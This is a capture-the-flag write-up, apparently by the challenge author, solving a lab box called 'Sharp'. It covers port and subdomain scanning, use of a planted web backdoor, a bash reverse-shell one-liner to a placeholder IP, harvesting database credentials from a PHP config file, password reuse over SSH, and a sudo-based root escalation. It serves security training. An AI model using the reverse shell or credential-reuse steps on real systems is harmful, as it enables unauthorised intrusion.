SHARP - H4K-IT KRISMASI CTF WRITEUP

### ENUMERATION First thing we do is scan the ports: ``` Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-25 01:20 EAT Nmap scan report for sharp.h4k (23.101.27.202) Host is up (0.39s latency). Not shown: 96 closed tcp ports (conn-refused) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 3306/tcp open mysql Nmap done: 1 IP address (1 host up) scanned in 2.26 seconds ``` Got 4 ports open! Opened up port 80 on web but nothing shows up just a default working page for apache2 ![](https://i.imgur.com/eu1HNRY.png) Since I made this challenge I wont dirbust coz I know once I dirbust nothing will show up , because there is nothing at all, which means the legit way is what i'll be showing (THE INTENDED WAY) of how to solve my box! ### RECON So first thing is to perform a subdomain scan ![](https://i.imgur.com/9s1R4Ar.png) and we get 3 subdomains that are found : ``` admin.sharp.h4k api.sharp.h4k pma.sharp.h4k ``` So first thing comes into mind is that we already see that admin.sharp.h4k must be the admin panel and then the api.* is the api or somn' and then we have pma.sharp.h4k probably the phpMyAdmin portal. Add those subdomains to your `/etc/hosts` file then let's get started! by first checking the admin panel And we are viewing a login page for an admin dashboard ![](https://i.imgur.com/4LOGIvn.png) Tryin SQLi wont work:) so it'll be a total waste of time but basically that is how a person solving this box would do , is try SQLi and maybe dirbusting but I assure you will get nothing at all:) So let's check `api.sharp.h4k`, we get an underdevelopment page , so this means the api is still underdev , but normally developers would have to save their backup file inside even though it's still underdevelopment so , let's try dirbusting this subdomain instead: ![](https://i.imgur.com/F7ojuKa.png) Okay looks like we have one directory , and that is `/images/` So let's dive into it: ![](https://i.imgur.com/yNPbE4V.png) Alright looks like we have something that's named `SECRET API CALLS` as the title! this sure looks like a backdoor that a hacker might have installed in the same target that we are given , let's try typing in a command and see what we get! ![](https://i.imgur.com/K0xuWAZ.png) That is what I got after typing `id` , so yes we are right , it's a backdoor ### GAINING INITIAL FOOTHOLD We can easily get shell by just setting a listener and then forwarding our self a shell easy as that , so why not let's try it! So on my terminal I'll set up a listener on port 1337 ![](https://i.imgur.com/FMb2eH1.png) And then from the input i'll type in a command that will give us back a revshell as follows : ```bash= bash -c "bash -i &>/dev/tcp/yourip/1337 <&1" ``` and then click `submit` ![](https://i.imgur.com/BgLPY7P.png) You didn't expect that to work did you?? Well the reason it didn't work it's because it's a server using a public IP and we are a private IP so it's either you use a VPS to grab shell or make ur localhost PUBLIC, well I have VPS so i'll just go ahead and use it instead! but if you are not having a VPS then you can use Ngrok for tunneling. Alright Now that I have a listener running on my VPS , i just do the same methods but with my VPS's IP address and not my localhost ![](https://i.imgur.com/bnAQnHg.png) And boom we have SHELL!!!! So Now let's gather some config files and escalate our privileges to a user first of all let's check what user is available ``` www-data@sharp:/var/www/api/images$ cat /etc/passwd | grep /home cat /etc/passwd | grep /home xploiter:x:1000:1000::/home/xploiter:/bin/bash babukrismasi:x:1001:100::/home/babukrismasi:/bin/bash ``` we have a total of 2 users , who are `xploiter` and `babukrismasi` , so let's grab some config by performing some lateral movement ``` www-data@sharp:/var/www$ -al ls -al total 24 drwxr-xr-x 6 root root 4096 Dec 24 10:58 . drwxr-xr-x 12 root root 4096 Dec 20 22:04 .. drwxr-xr-x 4 root root 4096 Dec 24 10:51 admin drwxr-xr-x 3 root root 4096 Dec 24 11:26 api drwxr-xr-x 2 root root 4096 Dec 20 22:04 html drwxr-xr-x 11 root root 4096 Dec 24 11:02 myadmin ``` moving into `admin` first because dashboards such of these usually have configuration files ``` www-data@sharp:/var/www/admin/lib$ -la ls -la total 32 drwxr-xr-x 2 root root 4096 Dec 24 11:12 . drwxr-xr-x 4 root root 4096 Dec 24 10:51 .. -rw-r--r-- 1 root root 13 Jun 8 2018 .htaccess -rw-r--r-- 1 root root 711 Dec 24 11:12 Core.php -rw-r--r-- 1 root root 1131 Nov 11 10:18 LIB-database.php -rw-r--r-- 1 root root 47 Nov 11 00:17 PAGE-bottom.php -rw-r--r-- 1 root root 1546 Nov 11 11:00 PAGE-top.php -rw-r--r-- 1 root root 693 Jan 28 2021 SQL-users.sql ``` I found `Core.php` which has some connection to the MYSQL ```php www-data@sharp:/var/www/admin/lib$ cat Core.php cat Core.php <?php // (A) ERROR HANDLING - CHANGE TO YOUR OWN error_reporting(E_ALL & ~E_NOTICE); ini_set("display_errors", 1); // ini_set("log_errors", 1); // ini_set("error_log", "PATH/error.log"); // (B) DATABASE SETTINGS - CHANGE TO YOUR OWN define("DB_HOST", "localhost"); define("DB_NAME", "panel"); define("DB_CHARSET", "utf8"); define("DB_USER", "root"); define("DB_PASSWORD", "superPassw0rd"); // (C) URL define("URL_HOST", "http://admin.sharp.h4k/"); // CHANGE TO YOUR OWN define("URL_PUBLIC", URL_HOST . "public/"); // (D) FILE PATHS define("PATH_LIB", __DIR__ . DIRECTORY_SEPARATOR); define("PATH_BASE", dirname(PATH_LIB) . DIRECTORY_SEPARATOR); // (E) START SESSION session_start(); ``` So we got `mysql` username and password which is `root:superPassw0rd` , let's try reuse the same password for the users available. ### FOOTHOLD USER I was now able to login via ssh to `babukrismasi` with the password `superPassw0rd` ![](https://i.imgur.com/f4MuCI9.png) And we get the flag from his home folder: ``` babukrismasi@sharp:~$ ls -al total 24 drwxr-xr-x 2 babukrismasi users 4096 Des 24 12:49 . drwxr-xr-x 4 root root 4096 Des 24 11:34 .. -rw-r--r-- 1 babukrismasi users 220 Mei 15 2017 .bash_logout -rw-r--r-- 1 babukrismasi users 3526 Mei 15 2017 .bashrc -rw-r--r-- 1 root root 24 Des 24 12:49 flag.txt -rw-r--r-- 1 babukrismasi users 675 Mei 15 2017 .profile babukrismasi@sharp:~$ cat flag.txt h4k-it{USERMTATA_KWELI} ``` ##### FLAG FOR SHARP - USER : h4k-it{USERMTATA_KWELI} ### PRIVILEGE ESCALATION Alright with that being found , let's escalate our privileges to root So first we do is check what privileges we have that allows us to run a certain binary with SUDO perms using `sudo -l` ``` babukrismasi@sharp:~$ sudo -l [sudo] password for babukrismasi: Matching Defaults entries for babukrismasi on sharp: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User babukrismasi may run the following commands on sharp: (ALL) /usr/bin/vitayakrismasi ``` and we can run the binary named `vitayakrismasi` using `sudo` with user `babukrismasi` so let's try and see what the binary does and try reverse it if it needs us to! ![](https://i.imgur.com/XBKkNpW.png) it needs a username to proceed, So I check the strings and I'm able to get a glimps of what the username and password might be: ![](https://i.imgur.com/wZrTbGk.png) so the usernames according to my gathering can be either `spiderman` or `fazakrismasi`, so let's give it a try ![](https://i.imgur.com/oDeUyEu.png) we get prompted for a password ``` babukrismasi@sharp:~$ sudo vitayakrismasi SPIDERMAN VERSUS BABU KRISMASI UTAJUA HUJUI KUDADEKI! Enter username : fazakrismasi Welcome Faza Krismasi , Enter your password : adminadmin IMPOSTER NYAMA WEWE! ``` but we dont know the password , I try performing Ltrace but still nothing comes accross ``` babukrismasi@sharp:~$ ltrace vitayakrismasi 1 puts("SPIDERMAN VERSUS BABU KRISMASI"SPIDERMAN VERSUS BABU KRISMASI ) = 31 puts("UTAJUA HUJUI KUDADEKI! "UTAJUA HUJUI KUDADEKI! ) = 24 printf("Enter username : ") = 17 gets(0x7ffd421a0ef6, 0x5632251afa6f, 0x7f6569ba5760, 0x5632251afa80Enter username : fazakrismasi ) = 0x7ffd421a0ef6 strcmp("fazakrismasi", "spiderman") = -13 strcmp("fazakrismasi", "fazakrismasi") = 0 printf("Welcome Faza Krismasi , Enter yo"...) = 46 __isoc99_scanf(0x5632251afab3, 0x7ffd421a0ed8, 0x7f6569ba5760, 0x5632251afb4eWelcome Faza Krismasi , Enter your password : admin ) = 0 puts("IMPOSTER NYAMA WEWE!"IMPOSTER NYAMA WEWE! ) = 21 +++ exited (status 0) +++ ``` So there are baiscally two ways getting the password now , so the first way is to guess and the second way is to pull the binary to ur localhost for investigations , and i'll consider doing that way lol! First move to `/tmp`: ``` babukrismasi@sharp:/tmp$ ls -l total 60 -rw-r--r-- 1 xploiter xploiter 35560 Apr 29 2019 mysql-apt-config_0.8.13-1_all.deb drwx------ 3 root root 4096 Des 24 13:10 systemd-private-773be1f6958c44f29cfec16a7f1b4984-apache2.service-b1WVzE drwx------ 3 root root 4096 Des 23 14:14 systemd-private-773be1f6958c44f29cfec16a7f1b4984-systemd-timesyncd.service-h1j06s -rw-r--r-- 1 babukrismasi users 9 Des 25 15:16 tobedeleted.txt -rwxr-xr-x 1 xploiter xploiter 8912 Des 25 15:13 vitayakrismasi ``` we get the binary also available over there, and we also have another file named `tobedeleted.txt` let's read it inside: ``` babukrismasi@sharp:/tmp$ cat tobedeleted.txt 25122021 ``` Alright we get some numbers that make up the christmass date , that's probably the password let's test it on the binary: ``` babukrismasi@sharp:/tmp$ ./vitayakrismasi SPIDERMAN VERSUS BABU KRISMASI UTAJUA HUJUI KUDADEKI! Enter username : fazakrismasi Welcome Faza Krismasi , Enter your password : 25122021 Why are you mad na?, RELAX BIG MAN , Spiderman ran away! cat: /root/flag.txt: Permission denied ``` And perfectly worked! So now let's do it with sudo : ``` babukrismasi@sharp:~$ sudo vitayakrismasi [sudo] password for babukrismasi: SPIDERMAN VERSUS BABU KRISMASI UTAJUA HUJUI KUDADEKI! Enter username : fazakrismasi Welcome Faza Krismasi , Enter your password : 25122021 Why are you mad na?, RELAX BIG MAN , Spiderman ran away! h4k-it{uschezenakrismasi_sio_poa} ``` and we have the ROOT FLAG!!! `h4k-it{uschezenakrismasi_sio_poa}` --- ``` 25 | 12 | 2021 | @tahaafarooq (twitter)